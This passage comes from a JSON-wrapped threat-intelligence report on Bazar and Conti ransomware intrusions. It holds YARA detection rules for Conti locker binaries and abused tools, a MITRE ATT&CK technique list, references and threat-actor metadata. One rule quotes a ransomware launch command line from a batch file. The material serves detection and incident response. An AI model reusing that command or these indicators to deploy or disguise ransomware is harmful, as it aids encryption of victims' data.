ascii\r\n $s18 = \"Z72.irZ\" fullword ascii\r\n $s19 = \"Ve:\\\\-Sj7\" fullword ascii\r\n $s20 = \"ekX.cFm\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 11000KB and\r\n 1 of ($x*) and 4 of them\r\n}\r\nrule ProcessHacker {\r\n meta:\r\n description = \"mal - file ProcessHacker.exe\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-11-29\"\r\n hash1 = \"d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f\"\r\n strings:\r\n $x1 = \"Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\taskmgr.exe\" fullword wide\r\n $x2 = \"D:\\\\Projects\\\\processhacker2\\\\bin\\\\Release32\\\\ProcessHacker.pdb\" fullword ascii\r\n $x3 = \"ProcessHacker.exe\" fullword wide\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 23 of 27\n\n$x4 = \"kprocesshacker.sys\" fullword wide\n $x5 = \"ntdll.dll!NtDelayExecution\" fullword wide\n $x6 = \"ntdll.dll!ZwDelayExecution\" fullword wide\n $s7 = \"PhInjectDllProcess\" fullword ascii\n $s8 = \"_PhUiInjectDllProcess@8\" fullword ascii\n $s9 = \"logonui.exe\" fullword wide\n $s10 = \"Executable files (*.exe;*.dll;*.ocx;*.sys;*.scr;*.cpl)\" fullword wide\n $s11 = \"\\\\x86\\\\ProcessHacker.exe\" fullword wide\n $s12 = \"user32.dll!NtUserGetMessage\" fullword wide\n $s13 = \"ntdll.dll!NtWaitForKeyedEvent\" fullword wide\n $s14 = \"ntdll.dll!ZwWaitForKeyedEvent\" fullword wide\n $s15 = \"ntdll.dll!NtReleaseKeyedEvent\" fullword wide\n $s16 = \"ntdll.dll!ZwReleaseKeyedEvent\" fullword wide\n $s17 = \"\\\\kprocesshacker.sys\" fullword wide\n $s18 = \"\\\\SystemRoot\\\\system32\\\\drivers\\\\ntfs.sys\" fullword wide\n $s19 = \"_PhExecuteRunAsCommand2@36\" fullword ascii\n $s20 = \"_PhShellExecuteUserString@20\" fullword ascii\n condition:\n uint16(0) == 0x5a4d and filesize \u003c 4000KB and\n 1 of ($x*) and 4 of them\n}\nrule unlocker {\n meta:\n description = \"mal - file unlocker.exe\"\n author = \"TheDFIRReport\"\n date = \"2021-11-29\"\n hash1 = \"09d7fcbf95e66b242ff5d7bc76e4d2c912462c8c344cb2b90070a38d27aaef53\"\n strings:\n $s1 = \"For more detailed information, please visit http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline\" fu\n $s2 = \"(Symantec SHA256 TimeStamping Signer - G20\" fullword ascii\n $s3 = \" \" fullword ascii\n $s4 = \"(Symantec SHA256 TimeStamping Signer - G2\" fullword ascii\n $s5 = \"Causes Setup to create a log file in the user's TEMP directory.\" fullword wide\n $s6 = \"Prevents the user from cancelling during the installation process.\" fullword wide\n $s7 = \"Same as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\" fullword wide\n $s8 = \" true\" fullword a\n $s9 = \"The Setup program accepts optional command line parameters.\" fullword wide\n $s10 = \"Instructs Setup to load the settings from the specified file after having checked the command line.\" fullwor\n $s11 = \"Overrides the default component settings.\" fullword wide\n $s12 = \"/MERGETASKS=\\\"comma separated list of task names\\\"\" fullword wide\n $s13 = \"/PASSWORD=password\" fullword wide\n $s14 = \"Specifies the password to use.\" fullword wide\n $s15 = \"yyyyvvvvvvvvvxxw\" fullword ascii\n $s16 = \"yyyyyyrrrsy\" fullword ascii\n $s17 = \" processorArchitecture=\\\"x86\\\"\" fullword ascii\n $s18 = \" processorArchitecture=\\\"x86\\\"\" fullword ascii\n $s19 = \"Prevents Setup from restarting the system following a successful installation, or after a Preparing to Insta\n $s20 = \"/DIR=\\\"x:\\\\dirname\\\"\" fullword wide\n condition:\n uint16(0) == 0x5a4d and filesize \u003c 7000KB and\n 8 of them\n}\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\nPage 24 of 27\n\nrule mal_host2_locker {\r\n meta:\r\n description = \"mal - file locker.bat\"\r\n author = \"TheDFIRReport\"\r\n date = \"2021-11-29\"\r\n hash1 = \"1edfae602f195d53b63707fe117e9c47e1925722533be43909a5d594e1ef63d3\"\r\n strings:\r\n $x1 = \"_locker.exe -m -net -size 10 -nomutex -p\" ascii\r\n condition:\r\n uint16(0) == 0x7473 and filesize \u003c 8KB and\r\n $x1\r\n}\r\nimport \"pe\"\r\nrule o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker {\r\n meta:\r\n description = \"conti - file o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-11-29\"\r\n hash1 = \"9cd3c0cff6f3ecb31c7d6bc531395ccfd374bcd257c3c463ac528703ae2b0219\"\r\n strings:\r\n $s1 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n $s2 = \"operator co_await\" fullword ascii\r\n $s3 = \"\u003e*\u003e6\u003eA\u003e_\u003e\" fullword ascii /* hex encoded string 'j' */\r\n $s4 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n $s5 = \"Bapi-ms-win-core-fibers-l1-1-1\" fullword wide\r\n $s6 = \"SVWjEhQ\" fullword ascii\r\n $s7 = \";F;[;l;\" fullword ascii /* Goodware String - occured 1 times */\r\n $s8 = \"74787@7H7P7T7\\\\7p7\" fullword ascii /* Goodware String - occured 1 times */\r\n $s9 = \"6#606B6\" fullword ascii /* Goodware String - occured 1 times */\r\n $s10 = \"\u003c!=X=u=\" fullword ascii /* Goodware String - occured 1 times */\r\n $s11 = \"expand 32-byte k\" fullword ascii /* Goodware String - occured 1 times */\r\n $s12 = \"6!7?7J7\" fullword ascii /* Goodware String - occured 2 times */\r\n $s13 = \"delete\" fullword ascii /* Goodware String - occured 2789 times */\r\n $s14 = \"4!4(4/464=4D4K4R4Z4b4j4v4\" fullword ascii /* Goodware String - occured 3 times */\r\n $s15 = \".CRT$XIAC\" fullword ascii /* Goodware String - occured 3 times */\r\n $s16 = \"0#0)01060\\\\0a0\" fullword ascii\r\n $s17 = \";\\\";/;=;K;V;l;\" fullword ascii\r\n $s18 = \"6,606P6X6\\\\6x6\" fullword ascii\r\n $s19 = \"6(6,6@6D6H6L6P6T6X6\\\\6`6d6p6t6x6|6\" fullword ascii\r\n $s20 = \"8 :M:}:\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 600KB and\r\n ( pe.imphash() == \"50472e0ba953856d228c7483b149ea72\" or all of them )\r\n}\r\nrule o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x86 {\r\n meta:\r\n description = \"conti - file o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x86.dll\"\r\n author = \"The DFIR Report\"\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 25 of 27\n\nreference = \"https://thedfirreport.com/\"\r\n date = \"2021-11-29\"\r\n hash1 = \"01a9549c015cfcbff4a830cea7df6386dc5474fd433f15a6944b834551a2b4c9\"\r\n strings:\r\n $s1 = \"conti_v3.dll\" fullword ascii\r\n $s2 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n $s3 = \"6 7/787E7[7\" fullword ascii /* hex encoded string 'gx~w' */\r\n $s4 = \"operator co_await\" fullword ascii\r\n $s5 = \"2%3.3f3~3\" fullword ascii /* hex encoded string '#?3' */\r\n $s6 = \"1\\\"1\u00261,:4:\u003c:D:L:T:\\\\:d:l:t:|:\" fullword ascii $s7 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide $s8 =\r\n $s17 = \"QQSVj8j@\" fullword ascii\r\n $s18 = \"5-5X5s5\" fullword ascii /* Goodware String - occured 1 times */\r\n $s19 = \"expand 32-byte k\" fullword ascii /* Goodware String - occured 1 times */\r\n $s20 = \"delete\" fullword ascii /* Goodware String - occured 2789 times */\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 600KB and\r\n ( pe.imphash() == \"749dc5143e9fc01aa1d221fb9a48d5ea\" or all of them )\r\n}\r\nrule o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x64 {\r\n meta:\r\n description = \"conti - file o4IRWsH4N1a3hjO9Sy2rPP02oyUddH7zA5xGih0ESmlhiiXD9kpWVCPfOwUnayZp_locker_x64.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2021-11-29\"\r\n hash1 = \"31656dcea4da01879e80dff59a1af60ca09c951fe5fc7e291be611c4eadd932a\"\r\n strings:\r\n $s1 = \"conti_v3.dll\" fullword ascii\r\n $s2 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n $s3 = \"operator co_await\" fullword ascii\r\n $s4 = \"api-ms-win-appmodel-runtime-l1-1-2\" fullword wide\r\n $s5 = \"api-ms-win-core-file-l1-2-2\" fullword wide /* Goodware String - occured 1 times */\r\n $s6 = \"__swift_2\" fullword ascii\r\n $s7 = \"__swift_1\" fullword ascii\r\n $s8 = \"expand 32-byte k\" fullword ascii /* Goodware String - occured 1 times */\r\n $s9 = \"u3HcH\u003cH\" fullword ascii /* Goodware String - occured 2 times */\r\n $s10 = \"D$XD9x\" fullword ascii /* Goodware String - occured 2 times */\r\n $s11 = \"delete\" fullword ascii /* Goodware String - occured 2789 times */\r\n $s12 = \"ue!T$(H!T$ \" fullword ascii\r\n $s13 = \"L$\u00268\\\\$\u0026t,8Y\" fullword ascii\r\n $s14 = \"F 2-by\" fullword ascii\r\n $s15 = \"u\\\"8Z(t\" fullword ascii\r\n $s16 = \"L$ |+L;\" fullword ascii\r\n $s17 = \"vB8_(t\" fullword ascii\r\n $s18 = \"ext-ms-\" fullword wide\r\n $s19 = \"OOxq*H\" fullword ascii\r\n $s20 = \"H97u+A\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 600KB and\r\n ( pe.imphash() == \"137fa89046164fe07e0dd776ed7a0191\" or all of them )\r\n}\r\nMITRE\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 26 of 27\n\nT1218.010 - Signed Binary Proxy Execution: Regsvr32\r\nT1218.005 - Signed Binary Proxy Execution: Mshta\r\nT1218.011 - Signed Binary Proxy Execution: Rundll32\r\nT1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage\r\nT1105 - Ingress Tool Transfer\r\nT1059.005 - Command and Scripting Interpreter: Visual Basic\r\nT1059.007 - Command and Scripting Interpreter: JavaScript\r\nT1059.001 - Command and Scripting Interpreter: PowerShell\r\nT1055 - Process Injection\r\nT1486 - Data Encrypted for Impact\r\nT1482 - Domain Trust Discovery\r\nT1047 - Windows Management Instrumentation\r\nT1021.002 - Remote Services: SMB/Windows Admin Shares\r\nT1124 - System Time Discovery\r\nT1021.001 - Remote Services: Remote Desktop Protocol\r\nT1566.001 - Phishing: Spearphishing Attachment\r\nT1087.002 - Account Discovery: Domain Account\r\nT1087.001 - Account Discovery: Local Account\r\nT1057 - Process Discovery\r\nT1083 - File and Directory Discovery\r\nT1590.005 - Gather Victim Network Information: IP Addresses\r\nMITRE Software\r\nNet – S0039\r\nNltest – S0359\r\nCmd – S0106\r\nTasklist – S0057\r\nCobalt Strike – S0154\r\nAdFind - S0552\r\nReference\r\nDetecting Rclone – An Effective Tool for Exfiltration, NCC Group –\r\nhttps://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/\r\nRundll32, Red Canary – https://redcanary.com/threat-detection-report/techniques/rundll32/\r\nTA551 (Shathak) continues pushing BazarLoader, infections lead to Cobalt Strike, SANS ISC –\r\nhttps://isc.sans.edu/forums/diary/TA551+Shathak+continues+pushing+BazarLoader+infections+lead+to+Cobalt+Strike/277\r\nInvoke-ShareFinder, GitHub [Veil PowerView] – https://github.com/darkoperator/Veil-PowerView/blob/master/PowerView/functions/Invoke-ShareFinder.ps1\r\ntaskmgr.exe slashing numbers, Hexicorn – https://www.hexacorn.com/blog/2018/07/22/taskmgr-exe-slashing-numbers/\r\nInternal case #5794\r\nSource: https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\r\nPage 27 of 27", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MITRE", "Malpedia" ], "references": [ "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/" ], "report_names": [ "continuing-the-bazar-ransomware-story" ], "threat_actors": [ { "id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f", "created_at": "2022-10-25T15:50:23.579601Z", "updated_at": "2026-04-10T02:00:05.360509Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "TA551", "GOLD CABIN", "Shathak" ], "source_name": "MITRE:TA551", "tools": [ "QakBot", "IcedID", "Valak", "Ursnif" ], "source_id": "MITRE", "reports": null }, { "id": "08c8f238-1df5-4e75-b4d8-276ebead502d", "created_at": "2023-01-06T13:46:39.344081Z", "updated_at": "2026-04-10T02:00:03.294222Z", "deleted_at": null, "main_name": "Copy-Paste", "aliases": [], "source_name": "MISPGALAXY:Copy-Paste", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "40b623c7-b621-48db-b55b-dd4f6746fbc6", "created_at": "2024-06-19T02:03:08.017681Z", "updated_at": "2026-04-10T02:00:03.665818Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shathak", "TA551 " ], "source_name": "Secureworks:GOLD CABIN", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "90f216f2-4897-46fc-bb76-3acae9d112ca", "created_at": "2023-01-06T13:46:39.248936Z", "updated_at": "2026-04-10T02:00:03.260122Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shakthak", "TA551", "ATK236", "G0127", "Monster Libra" ], "source_name": "MISPGALAXY:GOLD CABIN", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68", "created_at": "2022-10-25T16:07:24.578896Z", "updated_at": "2026-04-10T02:00:05.039955Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "G0127", "Gold Cabin", "Monster Libra", "Shathak", "TA551" ], "source_name": "ETDA:TA551", "tools": [ "BokBot", "CRM", "Gozi", "Gozi CRM", "IceID", "IcedID", "Papras", "Snifula", "Ursnif", "Valak", "Valek" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434019, "ts_updated_at": 1775792243, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/64e1e4cdab99fefe919b03ea76f82364cd9d41b1.pdf", "text": "https://archive.orkl.eu/64e1e4cdab99fefe919b03ea76f82364cd9d41b1.txt", "img": "https://archive.orkl.eu/64e1e4cdab99fefe919b03ea76f82364cd9d41b1.jpg" } }